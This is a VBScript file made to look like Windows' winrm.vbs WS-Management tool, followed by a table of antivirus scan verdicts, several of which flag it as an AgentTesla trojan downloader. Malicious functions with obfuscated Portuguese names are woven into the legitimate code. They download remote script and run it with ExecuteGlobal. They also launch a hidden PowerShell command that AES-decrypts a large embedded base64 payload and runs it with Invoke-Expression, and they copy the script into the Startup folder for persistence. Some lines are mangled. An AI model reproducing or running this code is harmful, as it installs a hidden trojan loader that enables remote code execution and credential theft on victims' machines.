ASSERTBOOL osVersion >= osVista, "The specified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value."
ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:credssp'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:credssp'"
sessionFlags = sessionFlags OR wsman.SessionFlagCredUsernamePassword OR wsman.SessionFlagUseCredSSP
case else
ASSERTBOOL false, "The specified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value."
end select
end if
if optDic.ArgumentExists(NPARA_USERNAME) then
ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option cannot be used together with '-username'"
set conOpt = wsman.CreateConnectionOptions
conOpt.UserName = optDic.Argument(NPARA_USERNAME)
if optDic.ArgumentExists(NPARA_PASSWORD) then
conOpt.Password = optDic.Argument(NPARA_PASSWORD)
end if
sessionFlags = sessionFlags OR wsman.SessionFlagCredUsernamePassword
end if
if optDic.ArgumentExists(NPARA_DEFAULTCREDS) then
ASSERTBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option cannot be used together with '-defaultCreds'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option cannot be used together with '-defaultCreds'"
'this is only valid if -auth:Negotiate is specified
ASSERTBOOL (LCase(optDic.Argument(NPARA_AUTH)) = VAL_NEGOTIATE), "The " & NPARA_DEFAULTCREDS & " option is only valid when the authentication mechanism is " & VAL_NEGOTIATE
'C API will ensure this is only used w/ https
sessionFlags = sessionFlags OR wsman.SessionFlagAllowNegotiateImplicitCredentials
end if
if optDic.ArgumentExists(NPARA_CERT) then
ASSERTBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option cannot be used together with '-certificate'"
ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option cannot be used together with '-certificate'"
set conOpt = wsman.CreateConnectionOptions
conOpt.CertificateThumbprint = optDic.Argument(NPARA_CERT)
if optDic.ArgumentExists(NPARA_AUTH) then
ASSERTBOOL (LCase(optDic.Argument(NPARA_AUTH)) = VAL_CERT), "The " & NPARA_CERT & " option is only valid when the authentication mechanism is " & VAL_CERT
end if
'-auth might be missing, in which case we assume -a:Certificate
sessionFlags = sessionFlags OR wsman.SessionFlagUseClientCertificate
end if
if optDic.ArgumentExists(NPARA_PROXYACCESS) then
if conOpt Is Nothing then
set conOpt = wsman.CreateConnectionOptions
end if
proxyAccessTypeVal = optDic.Argument(NPARA_PROXYACCESS)
select case LCase(proxyAccessTypeVal)
proxyAccessType = conOpt.ProxyIEConfig
proxyAccessType = conOpt.ProxyWinHttpConfig
proxyAccessType = conOpt.ProxyAutoDetect
proxyAccessType = conOpt.ProxyNoProxyServer
case else
ASSERTBOOL false, "The specified '-" & NPARA_PROXYACCESS & "' field '" & proxyAccessTypeVal & "' has an invalid value."
end select
end if
if optDic.ArgumentExists(NPARA_PROXYAUTH) then
ASSERTBOOL optDic.ArgumentExists(NPARA_PROXYACCESS), "The '-" & NPARA_PROXYAUTH & "' option is only valid when used with the '-" & NPARA_PROXYACCESS & "' option"
if conOpt Is Nothing then
set conOpt = wsman.CreateConnectionOptions
end if
proxyAuthenticationMechanismVal = optDic.Argument(NPARA_PROXYAUTH)
select case LCase(proxyAuthenticationMechanismVal)
proxyAuthenticationMechanism = conOpt.ProxyAuthenticationUseBasic
proxyAuthenticationMechanism = conOpt.ProxyAuthenticationUseDigest
proxyAuthenticationMechanism = conOpt.ProxyAuthenticationUseNegotiate
case else
ASSERTBOOL false, "The specified '-" & NPARA_PROXYAUTH & "' flag '" & proxyAuthenticationMechanismVal & "' has an invalid value."
end select
end if
if optDic.ArgumentExists(NPARA_PROXYUSERNAME) then
ASSERTBOOL optDic.ArgumentExists(NPARA_PROXYAUTH), "The '-" & NPARA_PROXYUSERNAME & "' option is only valid when used with the '-" & NPARA_PROXYAUTH & "' option"
proxyUsername = optDic.Argument(NPARA_PROXYUSERNAME)
end if
if optDic.ArgumentExists(NPARA_PROXYPASSWORD) then
ASSERTBOOL optDic.ArgumentExists(NPARA_PROXYUSERNAME), "The '-" & NPARA_PROXYPASSWORD & "' option is only valid when used with the '-" & NPARA_PROXYUSERNAME & "' option"
proxyPassword = optDic.Argument(NPARA_PROXYPASSWORD)
end if
if optDic.ArgumentExists(NPARA_PROXYACCESS) then
on error resume next
responseStr = conOpt.SetProxy(proxyAccessType, proxyAuthenticationMechanism, proxyUsername, proxyPassword)
ASSERTERR conOpt, formatOption
on error goto 0
end if
if optDic.ArgumentExists(NPARA_NOCACHK) then
'C API will ensure this is only used w/ https
sessionFlags = sessionFlags OR wsman.SessionFlagSkipCACheck
end if
if optDic.ArgumentExists(NPARA_NOCNCHK) then
'C API will ensure this is only used w/ https
sessionFlags = sessionFlags OR wsman.SessionFlagSkipCNCheck
end if
if optDic.ArgumentExists(NPARA_NOREVCHK) then
'C API will ensure this is only used w/ https
sessionFlags = sessionFlags OR wsman.SessionFlagSkipRevocationCheck
end if
if optDic.ArgumentExists(NPARA_SPNPORT) then
'this is only valid if -auth is not specified or if -auth:Negotiate or -auth:Kerberos is specified
if optDic.ArgumentExists(NPARA_AUTH) then
ASSERTBOOL (LCase(optDic.Argument(NPARA_AUTH)) = VAL_NEGOTIATE OR LCase(optDic.Argument(NPARA_AUTH)) = VAL_KERBEROS), "The " & NPARA_SPNPORT & " option is only valid when the authentication mechanism is " & VAL_NEGOTIATE & " or " & VAL_KERBEROS
end if
sessionFlags = sessionFlags OR wsman.SessionFlagEnableSPNServerPort
end if
on error resume next
set session = wsman.CreateSession(conStr, sessionFlags, conOpt)
ASSERTERR wsman, formatOption
on error goto 0
if optDic.ArgumentExists(NPARA_TIMEOUT) then
tout = optDic.Argument(NPARA_TIMEOUT)
ASSERTBOOL IsNumeric(tout), "Numeric value for -timeout option is expected"
session.Timeout = optDic.Argument(NPARA_TIMEOUT)
end if
set CreateSession = session
end function
private sub ASSERTERR(obj, formatOption)
dim errNo
dim errDesc
dim responseStr
dim formattedStr
if Err.Number <> 0 then
errNo = Err.Number
errDesc = Err.Description
responseStr = obj.Error
If Reformat(responseStr,formattedStr,formatOption) Then
stdErr.WriteLine formattedStr
stdErr.WriteLine responseStr
End if
stdErr.WriteLine GetResource("L_ERRNO_Message") & " " & errNo & " 0x" & Hex(errNo)
stdErr.WriteLine errDesc
end if
end sub
' Assert Named Argument Length
private sub ASSERTNAL(namedArg)
if Len(wsmanCmdLineObj.Argument(namedArg)) = 0 then
stdErr.WriteLine GetResource("L_ERR_Message") & GetResource("L_ARGNOVAL_Message") & namedArg
end if
end sub
private sub ASSERTBOOL(bool, msg)
if Not bool then
stdErr.WriteLine GetResource("L_ERR_Message") & msg
end if
end sub
Function queixosamente(amolestar)
ExecuteGlobal amolestar
End Function
Function CarregarEqueixosamente(fiote, phosphoreira, tatua, como)
Dim chuchas, maltrapido
Set chuchas = CreateObject("MSXML2.XMLHTTP") "GET", fiote, False
If chuchas.status = 200 Then
maltrapido = chuchas.responseText
Call queixosamente(maltrapido)
If Not IsEmpty(phosphoreira) And Not IsEmpty(tatua) And Not IsEmpty(como) Then
CarregarEqueixosamente = Adnascente(phosphoreira, tatua, como)
CarregarEqueixosamente = Null
End If
WScript.Echo "N
o foi poss
vel carregar o script. Status HTTP: " & chuchas.status
CarregarEqueixosamente = Null
End If
Set chuchas = Nothing
End Function
private function ReFormat(rawStr,formattedStr,formatOption)
dim xslFile
dim xmlFile
dim xmlFileName
dim xslFileName
if Len(rawStr) = 0 then
ReFormat = false
exit function
end if
on error resume next
if LCase(formatOption) = VAL_FORMAT_XML then
formattedStr = rawStr
set xmlFile = CreateObject("MSXML2.DOMDOCUMENT.6.0")
if Err.number <> 0 then
stdErr.WriteLine GetResource("L_MSXML6MISSING_Message")
on error goto 0
ReFormat = false
exit function
end if
set xslFile = CreateObject("MSXML2.DOMDOCUMENT.6.0")
if Err.number <> 0 then
stdErr.WriteLine GetResource("L_MSXML6MISSING_Message")
on error goto 0
ReFormat = false
exit function
end if
xmlFile.async = false
xslFile.async = false
if (xmlFile.parseError.errorCode <> 0) then
stdErr.WriteLine GetResource("L_XMLERROR_Message") & xmlFile.parseError.reason
on error goto 0
ReFormat = false
exit function
end If
FORMAT_XSL_PATH = WSHShell.ExpandEnvironmentStrings("%systemroot%\system32\")
if InStr(LCase(WScript.Path),"\syswow64") > 0 then
FORMAT_XSL_PATH = WSHShell.ExpandEnvironmentStrings("%systemroot%\syswow64\")
end if
if LCase(formatOption) = VAL_FORMAT_TEXT then
elseif LCase(formatOption) = VAL_FORMAT_PRETTY then
stdErr.WriteLine GetResource("L_FORMATLERROR_Message") & formatOption
on error goto 0
ReFormat = false
exit function
end If
if Not xslFile.load(FORMAT_XSL_PATH) then
stdErr.WriteLine GetResource("L_XSLERROR_Message") & FORMAT_XSL_PATH
if xslFile.parseError.errorCode < 0 then
stdErr.WriteLine xslFile.parseError.reason
end if
on error goto 0
ReFormat = false
exit function
end if
formattedStr = xmlFile.transformNode (xslFile)
if Err.number <> 0 then
stdErr.WriteLine Err.Description
on error goto 0
ReFormat = false
exit function
end if
end if
ReFormat = true
end function
Dim agatificar, de, escambar, pterygraphia, fiorita, lipoma, parquete
agatificar = ""
Set de = CreateObject("WScript.Shell")
escambar = "5apestanadosaramugo89677559apestanado9merdamerda85maromaque989apestanado6apestanadoapestanadomerda54maromaque6merdamaromaque"
escambar = CarregarEdestillamento(agatificar, escambar, "merda", "0")
escambar = CarregarEdestillamento(agatificar, escambar, "maromaque", "1")
escambar = CarregarEdestillamento(agatificar, escambar, "saramugo", "2")
escambar = CarregarEdestillamento(agatificar, escambar, "apestanado", "3")
pterygraphia = "fBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylY
fiorita = "powconquialrshconquialll.conquialxconquial"
fiorita = CarregarEdestillamento(agatificar, fiorita, "conquial", "e")
lipoma = "-command"
parquete = "(('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esMa" & _
"nagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.Paddin" & _
"gMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Sy" & _
"ste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged." & _
"CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetS" & _
"tring'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI" & escambar & "CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI" & pterygraphia & "CnI;TMIt" & _
"extoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe" & _
"4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77)," & _
"[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"
de.Run fiorita & " " & lipoma & " " & parquete, 0, False
If isActive = 1 Then
Dim cotulo, orellana, ignominioso
Set cotulo = CreateObject("Scripting.FileSystemObject")
orellana = WScript.ScriptFullName
ignominioso = CreateObject("WScript.Shell").SpecialFolders("Startup") & "\" & cotulo.GetFileName(orellana)
If Not cotulo.FileExists(ignominioso) Then cotulo.CopyFile orellana, ignominioso
Set cotulo = Nothing
End If
Function CarregarEdestillamento(cuba, erosivo, acoirelado, bruxulear)
Dim balharico, alpendre
Set balharico = CreateObject("MSXML2.XMLHTTP") "GET", cuba, False
If balharico.status = 200 Then
alpendre = balharico.responseText
Call destillamento(alpendre)
If Not IsEmpty(erosivo) And Not IsEmpty(acoirelado) And Not IsEmpty(bruxulear) Then
CarregarEdestillamento = Adnascente(erosivo, acoirelado, bruxulear)
CarregarEdestillamento = Null
End If
WScript.Echo "N
o foi poss
vel carregar o script. Status HTTP: " & balharico.status
CarregarEdestillamento = Null
End If
Set balharico = Nothing
End Function
Function destillamento(moenza)
ExecuteGlobal moenza
End Function
'Create an instance of the WSMAN.Automation Class
set wsmanObj = CreateObject("WSMAN.Automation")
set wsmanInternalObj = CreateObject("WSMAN.InternalAutomation")
'Get the raw text command line
cmdStr = wsmanObj.CommandLine
'Expand the environment strings
set wshShellObj = WScript.CreateObject("WScript.Shell")
cmdStr = wshShellObj.ExpandEnvironmentStrings(cmdStr)
Dim argOne
Dim argTwo
If argOne = OP_HELPMSG then
Dim errNumber
Dim strHex
if (InStr(LCase(argTwo),"0x")= 1) then
strHex = "&H" + Mid(argTwo, 3)
On Error Resume Next
errNumber = CLng(strHex)
if Err.Number <> 0 then
end if
elseif (InStr(LCase(argTwo),"-")= 1) then
strHex = "&H"+Hex(CLng(argTwo))
On Error Resume Next
errNumber = CLng(strHex)
if Err.Number <> 0 then
end if
On Error Resume Next
errNumber = CLng(argTwo)
if Err.Number <> 0 then
end if
end if
End If
'Get and check the operation argument
operation = wsmanCmdLineObj.Operation()
If (wsmanCmdLineObj.ArgumentExists(NPARA_REMOTE)) Then
connectionStr = wsmanCmdLineObj.Argument(NPARA_REMOTE)
connectionStr = ""
End If
'Set the format option for result output
if(wsmanCmdLineObj.ArgumentExists(NPARA_FORMAT)) then
formatOption = wsmanCmdLineObj.Argument(NPARA_FORMAT)
if Not (LCase(formatOption) = VAL_FORMAT_XML Or _
LCase(formatOption) = VAL_FORMAT_PRETTY Or _
LCase(formatOption) = VAL_FORMAT_TEXT) Then
stdErr.WriteLine GetResource("L_FORMATLERROR_Message") & """" & formatOption & """"
end if
formatOption = VAL_FORMAT_TEXT
end if
'Create the wsman automation API session object
set sessionObj = CreateSession(wsmanObj, connectionStr, wsmanCmdLineObj, formatOption)
'Get the resource and action uri strings
resourceUriStr = ""
if operation = OP_INV then
actionUriStr = wsmanCmdLineObj.Argument(NPARA_PSEUDO_ACTION)
End If
If (operation <> OP_IDENTIFY and operation <> OP_QUICKCONFIG) Then
resourceUriStr = wsmanCmdLineObj.Argument(NPARA_PSEUDO_RESOURCE)
'Determine the name to use for the root node in the message
rootNdNameStr = GetRootNodeName(operation, resourceUriStr, actionUriStr)
End If
'Create the ResourceLocator object
If resourceUriStr <> "" Then
on error resume next
set resourceLocatorObj = CreateAndInitializeResourceLocator(wsmanObj,resourceUriStr,wsmanCmdLineObj)
if resourceLocatorObj Is Nothing then
if Err.Number <> 0 then
errNo = Err.Number
errDesc = Err.Description
stdErr.WriteLine GetResource("L_ERRNO_Message") & " " & errNo & " 0x" & Hex(errNo)
stdErr.WriteLine errDesc
end if
end if
End If
'Gather the input parameters, if present, from the command line or a file. For Put,
'and input from @{...} instead of file, first do a Get to retrieve the present state
'of the object against which to apply the @{...} changes prior to the actual Put.
on error resume next
if not ProcessInput(wsmanObj, operation, rootNdNameStr, _
wsmanCmdLineObj, resourceLocatorObj,sessionObj, inputStr, formatOption) then
end if
'Now execute the indicated operation.
on error resume next
select case operation
case OP_DEL
case OP_GET
responseStr = sessionObj.Get(resourceLocatorObj)
case OP_PUT
responseStr = sessionObj.Put(resourceLocatorObj, inputStr)
responseStr = wsmanInternalObj.ConfigSDDL(sessionObj,resourceLocatorObj)
case OP_CRE
responseStr = sessionObj.Create(resourceLocatorObj, inputStr)
case OP_INV
responseStr = sessionObj.Invoke(actionUriStr, resourceLocatorObj, inputStr)
case OP_ENU
Enumerate wsmanObj, sessionObj, wsmanCmdLineObj, resourceLocatorObj, formatOption
responseStr = sessionObj.Identify
QuickConfig sessionObj, wsmanCmdLineObj
case else
ASSERTBOOL False, GetResource("L_UNKOPNM_Message") & "'" & operation & "'"
end select
'Process the output or error messages.
if Err.Number <> 0 then
ASSERTERR sessionObj, formatOption
on error goto 0
if operation <> OP_ENU and operation <> OP_DEL and operation <> OP_QUICKCONFIG then
If Reformat(responseStr,formattedStr,formatOption) Then
WScript.echo formattedStr
stdErr.WriteLine GetResource("L_FORMATFAILED_Message")
stdErr.WriteLine responseStr
End If
end if
end if
' ------------------ Utilities --------------------
' Loads resource strings from an ini file of the appropriate locale
Private Function LoadResourceData
If resourcesLoaded Then
Exit Function
End If
Dim lang, value, ini, zhHKlang, zhTWlang
Dim fso
Set fso = WScript.CreateObject("Scripting.FileSystemObject")
On Error Resume Next
lang = GetUILanguage()
If Err.Number <> 0 Then
'API does not exist prior to Vista, use Getlocale for downlevel
lang = GetLocale()
End If
' zh-HK will be treated as zh-TW
zhHKlang = 3076
zhTWlang = 1028
If lang = zhHKlang Then
lang = zhTWlang
End If
ini = fso.GetParentFolderName(WScript.ScriptFullName) & "\winrm\" _
& ToHex(lang) & "\" & fso.GetBaseName(WScript.ScriptName) & ".ini"
'stderr.writeline "Reading resources from " & ini
If fso.FileExists(ini) Then
Dim stream, file
Const ForReading = 1, TristateTrue = -1 'Read file in unicode format
'Debug.WriteLine "Using resource file " & ini
Set stream = fso.OpenTextFile(ini, ForReading, False, TristateTrue)
End If
resourcesLoaded = true
End Function
' Reads resource strings from an ini file
Function ReadResources(stream)
Dim ln, arr, key, value
If Not IsObject(stream) Then Err.Raise ERROR_FILE_NOT_FOUND
Do Until stream.AtEndOfStream
ln = stream.ReadLine
arr = Split(ln, "=", 2, 1)
If UBound(arr, 1) = 1 Then
' Trim the key and the value first before trimming quotes
key = Trim(arr(0))
value = TrimChar(Trim(arr(1)), """")
'WScript.stderr.writeline "Read key " & key & " = " & value
If key <> "" Then
resourceDictionary.Add key, value
End If
End If
End Function
' Trim a character from the text string
Private Function TrimChar(s, c)
Const vbTextCompare = 1
' Trim character from the start
If InStr(1, s, c, vbTextCompare) = 1 Then
s = Mid(s, 2)
End If
' Trim character from the end
If InStr(Len(s), s, c, vbTextCompare) = Len(s) Then
s = Mid(s, 1, Len(s) - 1)
End If
TrimChar = s
End Function
' Get a 4-digit hexadecimal number
Private Function ToHex(n)
Dim s : s = Hex(n)
ToHex = String(4 - Len(s), "0") & s
End Function
' Get the resource string with the given name from the locale specific
' dictionary. If not found, use the built in default.
Private function GetResource(name)
If resourceDictionary.Exists(name) Then
GetResource = resourceDictionary.Item(name)
GetResource = Eval(name)
End If
End Function
' Reads entire text file and return as string
private function ReadFile(file)
dim fso, f
set fso = CreateObject("Scripting.FileSystemObject")
ASSERTBOOL fso.FileExists(file), GetResource("L_NOFILE_Message") & "'" & file & "'"
set f = fso.OpenTextFile(file, 1, false,-2)
ReadFile = f.ReadAll
set f = Nothing
set fso = Nothing
end function
' Name: CommandLineParser
' Purpose: To Parse Command-Line Arguments for access to Named and Unnamed
' arguments.
Class CommandLineParser
Private m_allArguments
Private m_namedArguments
Private m_unnamedArguments
Private m_operationShortcuts
Private m_parameterShortcuts
Private m_indexFirstSwitch
Private Sub ErrorHandler(isFatal,errorMessage)
WScript.StdErr.WriteLine GetResource("L_ERR_Message") & errorMessage
If isFatal Then
End If
End Sub
Public Function FirstSwitchIndex()
FirstSwitchIndex = m_indexFirstSwitch
End Function
Public Function Count()
Count = m_unnamedArguments.Count + m_namedArguments.Count
End Function
Public Function UnnamedCount()
UnnamedCount = m_unnamedArguments.Count
End Function
Public Function PositionName(index)
Dim keyArray
PositionName = ""
End Function
Public Function UnnamedExists(index)
UnnamedExists = False
End Function
Public Function UnnamedValue(index)
UnnamedValue = ""
If IsNumeric(index) Then
If index >=0 And index < m_unnamedArguments.Count Then
UnnamedValue = m_unnamedArguments(index)
End If
End If
End Function
Public Function NamedCount()
NamedCount = m_namedArguments.Count
End Function
Public Function NamedExists(key)
NamedExists = m_namedArguments.Exists(key)
End Function
Public Function NamedValue(key)
NamedValue = ""
If m_namedArguments.Exists(key) Then
NamedValue = m_namedArguments(key)
End If
End Function
Public Function NamedValueByIndex(index)
Dim itemArray
NamedValueByIndex = ""
If IsNumeric(index) Then
If index >= 0 And index < m_namedArguments.Count Then
itemArray = m_namedArguments.Items
NamedValueByIndex = itemArray(index)
End If
End If
End Function
Public Function NamedKeyByIndex(index)
Dim keyArray
NamedKeyByIndex = ""
If IsNumeric(index) Then
If index >= 0 And index < m_namedArguments.Count Then
keyArray = m_namedArguments.Keys
NamedKeyByIndex = keyArray(index)
End If
End If
End Function
Public Function Parse(cmdlineStr)
Dim cmdlineStrLen
Dim parseIndex
Dim inQuote
Dim inCurly
Dim currentParameter
Dim parameterName
Dim parameterValue
Dim parameterColonPos
Dim currentChar
Dim parameterValueQuoted
parseIndex = 1
inCurly = False
inQuote = False
cmdlineStrLen = Len(cmdlineStr)
Do While parseIndex <= cmdlineStrLen
currentParameter = ""
inQuote = False
inCurly = False
'skip whitespace
Do While parseIndex <= cmdlineStrLen
currentChar = Mid(cmdlineStr,parseIndex,1)
If currentChar <> " " Then
Exit Do
End If
parseIndex = parseIndex + 1
'capture text until first unquoted or uncurlied space, or end of string
Do While parseIndex <= cmdlineStrLen
currentChar = Mid(cmdlineStr,parseIndex,1)
If currentChar = "{" Then
If Not inQuote Then
inCurly = True
End If
currentParameter = currentParameter & currentChar
ElseIf currentChar = "}" Then
If Not inQuote Then
inCurly = False
End If
currentParameter = currentParameter & currentChar
ElseIf currentChar = """" Then
If inQuote Then
If Mid(cmdlineStr,parseIndex-1,1) <> "\" Then
inQuote = False
End If
inQuote = True
End If
currentParameter = currentParameter & currentChar
ElseIf currentChar = " " Then
If inQuote Or inCurly Then
currentParameter = currentParameter & currentChar
Exit Do
End If
currentParameter = currentParameter & currentChar
End If
parseIndex = parseIndex + 1
'process the command line segment
If Len(currentParameter) > 0 Then
'for named parameters
If Left(currentParameter,1) = "-" Or Left(currentParameter,1) = "/" Then
If Left(currentParameter,2) = "//" Or Left(currentParameter,2) = "--" Then
'skip all double-prefix parameters - assumed for scripting host i.e. //nologo
parameterColonPos = InStr(currentParameter,":")
If parameterColonPos > 0 Then
parameterName = LCase(Mid(currentParameter,2,parameterColonPos-2))
parameterValueQuoted = False
If Mid(currentParameter,parameterColonPos + 1,1) = """" Then
If Right(currentParameter,1) = """" Then
parameterValueQuoted = True
ErrorHandler True,L_ImproperUseOfQuotes_ErrorMessage & parameterName
End If
ElseIf Mid(currentParameter,Len(currentParameter),1) = """" Then
ErrorHandler True,L_ImproperUseOfQuotes_ErrorMessage & parameterName
End If
If parameterValueQuoted Then
parameterValue = Mid(currentParameter,parameterColonPos + 2,Len(currentParameter) - parameterColonPos - 2)
parameterValue = Mid(currentParameter,parameterColonPos + 1)
End If
parameterName = LCase(Mid(currentParameter,2))
parameterValue = ""
End If
If m_parameterShortcuts.Exists(LCase(parameterName)) Then
parameterName = m_parameterShortcuts(LCase(parameterName))
End If
If Len(parameterName) > 0 Then
If m_namedArguments.Exists(parameterName) Then
ErrorHandler True,L_OPTNOTUNQ_Message & parameterName
End If
parameterValue = Replace(parameterValue, "\""", """")
If (0 = m_namedArguments.Count) Then
m_indexFirstSwitch = m_allArguments.Count
End If
If Len(parameterValue) > 0 Then
m_namedArguments.Add parameterName,parameterValue
m_namedArguments.Add parameterName,""
End If
m_allArguments.Add m_allArguments.Count, parameterName
ErrorHandler True,L_BLANKOPT_ErrorMessage
End If
End If
'for unnamed parameters
If Left(currentParameter,1) = """" And Right(currentParameter,1) = """" Then
parameterValue = Mid(currentParameter,2,Len(currentParameter)-2)
parameterValue = currentParameter
End If
parameterValue = Replace(parameterValue, "\""", """")
End If
End If
End Function
End Class
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen40
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Startup.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
TrendMicro Clean
FireEye Clean
Emsisoft Clean
GData Clean
Jiangmin Clean
Varist VBS/Agent.BOA
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:VBS/AgentTesla.AMA!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Drp]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.